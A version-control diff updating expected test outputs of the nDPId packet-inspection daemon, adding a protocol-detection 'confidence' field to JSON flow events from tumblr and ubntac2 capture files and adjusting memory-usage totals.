-00631{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::200e","src_port":58616,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00667{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::200e","src_port":58616,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00611{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::200e","src_port":58616,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00631{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::200e","src_port":58618,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00667{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::200e","src_port":58618,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00611{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::200e","src_port":58618,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00631{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292122874,"flow_last_seen":1605292122899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200a","src_port":40190,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00667{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292122874,"flow_last_seen":1605292122899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200a","src_port":40190,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00611{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292122874,"flow_last_seen":1605292122899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200a","src_port":40190,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":62,"flow_first_seen":1605292121486,"flow_last_seen":1605292122503,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":24052,"flow_avg_l4_payload_len":387,"midstream":0,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::4a72:9a16","src_port":43328,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Tumblr","breed":"Fun","category":"SocialNetwork"}}
-00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":289,"flow_first_seen":1605292105170,"flow_last_seen":1605292122449,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":187188,"flow_avg_l4_payload_len":647,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d28","src_port":43420,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
-00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":326,"flow_first_seen":1605292105171,"flow_last_seen":1605292122739,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":185805,"flow_avg_l4_payload_len":569,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d28","src_port":43434,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
-00624{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::df9:21c6","src_port":43602,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00717{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":62,"flow_first_seen":1605292121486,"flow_last_seen":1605292122503,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":24052,"flow_avg_l4_payload_len":387,"midstream":0,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::4a72:9a16","src_port":43328,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Tumblr","breed":"Fun","category":"SocialNetwork"}}
+00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":289,"flow_first_seen":1605292105170,"flow_last_seen":1605292122449,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":187188,"flow_avg_l4_payload_len":647,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d28","src_port":43420,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
+00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":326,"flow_first_seen":1605292105171,"flow_last_seen":1605292122739,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":185805,"flow_avg_l4_payload_len":569,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d28","src_port":43434,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
+00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::df9:21c6","src_port":43602,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00604{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::df9:21c6","src_port":43602,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00632{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":28,"flow_first_seen":1605292105726,"flow_last_seen":1605292122804,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":157,"flow_tot_l4_payload_len":1371,"flow_avg_l4_payload_len":48,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4c03","src_port":51874,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00668{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":28,"flow_first_seen":1605292105726,"flow_last_seen":1605292122804,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":157,"flow_tot_l4_payload_len":1371,"flow_avg_l4_payload_len":48,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4c03","src_port":51874,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00612{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":28,"flow_first_seen":1605292105726,"flow_last_seen":1605292122804,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":157,"flow_tot_l4_payload_len":1371,"flow_avg_l4_payload_len":48,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4c03","src_port":51874,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":63,"flow_first_seen":1605292122095,"flow_last_seen":1605292122344,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3141,"flow_tot_l4_payload_len":39546,"flow_avg_l4_payload_len":627,"midstream":0,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::200a","src_port":38608,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}}
-00631{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292120654,"flow_last_seen":1605292120853,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":55014,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00728{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":63,"flow_first_seen":1605292122095,"flow_last_seen":1605292122344,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3141,"flow_tot_l4_payload_len":39546,"flow_avg_l4_payload_len":627,"midstream":0,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::200a","src_port":38608,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}}
+00667{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292120654,"flow_last_seen":1605292120853,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":55014,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00611{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292120654,"flow_last_seen":1605292120853,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":55014,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00631{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2002","src_port":50960,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00667{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2002","src_port":50960,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00611{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2002","src_port":50960,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00159{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","total-events-serialized":271}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
@@ -277,9 +277,9 @@
 ~~ total active/idle flows...: 47/47
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 5786600 bytes
-~~ total memory freed........: 5786600 bytes
-~~ total allocations/frees...: 124526/124526
+~~ total memory allocated....: 5856465 bytes
+~~ total memory freed........: 5856465 bytes
+~~ total allocations/frees...: 126116/126116
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 164 chars
 ~~ json string max len.......: 1388 chars
diff --git a/test/results/ubntac2.pcap.out b/test/results/ubntac2.pcap.out
index cbbe92699..84939a307 100644
--- a/test/results/ubntac2.pcap.out
+++ b/test/results/ubntac2.pcap.out
@@ -1,36 +1,36 @@
 00439{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"ubntac2.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486943433175,"flow_last_seen":1486943433175,"flow_idle_time":180000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"ts_msec":1486943433175,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":34085,"dst_port":10001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00676{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1486943433175,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":217,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":217,"pkt_l4_len":183,"ts_msec":1486943433175,"pkt":"\/\/\/\/\/\/\/\/gCqojWksCABFAADLv4FAAEARuPfAqAEB\/\/\/\/\/4UlJxEAtx2vAgYAqwIACoAqqI1pK8CoAhUCAAqAKqiNaSzAqAEBAQAGgCqojWkrCgAEAADeYAsABHVibnQMAARVR1czAwA4VW5pRmlTZWN1cml0eUdhdGV3YXkuRVItZTEyMC52NC4zLjMzLjQ5MzYwODYuMTYxMjAzLjIwMzEWAA40LjMuMzMuNDkzNjA4NhUABFVHVzMXAAEAGAABABMABoAqqI1pKxIABAAAFc8bAAU0LjAuMA=="}
-00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486943433175,"flow_last_seen":1486943433175,"flow_idle_time":180000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"ts_msec":1486943433175,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":34085,"dst_port":10001,"l4_proto":"udp","ndpi": {"proto":"UBNTAC2","breed":"Safe","category":"Network"},"ubntac2": {"version":"UniFiSecurityGateway.ER-e120.v4"}}
+00691{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486943433175,"flow_last_seen":1486943433175,"flow_idle_time":180000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"ts_msec":1486943433175,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":34085,"dst_port":10001,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"UBNTAC2","breed":"Safe","category":"Network"},"ubntac2": {"version":"UniFiSecurityGateway.ER-e120.v4"}}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486943443357,"flow_last_seen":1486943443357,"flow_idle_time":180000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"ts_msec":1486943443357,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":44641,"dst_port":10001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00677{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1486943443357,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":217,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":217,"pkt_l4_len":183,"ts_msec":1486943443357,"pkt":"\/\/\/\/\/\/\/\/gCqojWksCABFAADLv4JAAEARuPbAqAEB\/\/\/\/\/65hJxEAt\/NoAgYAqwIACoAqqI1pK8CoAhUCAAqAKqiNaSzAqAEBAQAGgCqojWkrCgAEAADeagsABHVibnQMAARVR1czAwA4VW5pRmlTZWN1cml0eUdhdGV3YXkuRVItZTEyMC52NC4zLjMzLjQ5MzYwODYuMTYxMjAzLjIwMzEWAA40LjMuMzMuNDkzNjA4NhUABFVHVzMXAAEAGAABABMABoAqqI1pKxIABAAAFdAbAAU0LjAuMA=="}
-00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486943443357,"flow_last_seen":1486943443357,"flow_idle_time":180000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"ts_msec":1486943443357,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":44641,"dst_port":10001,"l4_proto":"udp","ndpi": {"proto":"UBNTAC2","breed":"Safe","category":"Network"},"ubntac2": {"version":"UniFiSecurityGateway.ER-e120.v4"}}
+00691{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486943443357,"flow_last_seen":1486943443357,"flow_idle_time":180000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"ts_msec":1486943443357,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":44641,"dst_port":10001,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"UBNTAC2","breed":"Safe","category":"Network"},"ubntac2": {"version":"UniFiSecurityGateway.ER-e120.v4"}}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486943453510,"flow_last_seen":1486943453510,"flow_idle_time":180000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"ts_msec":1486943453510,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":55321,"dst_port":10001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
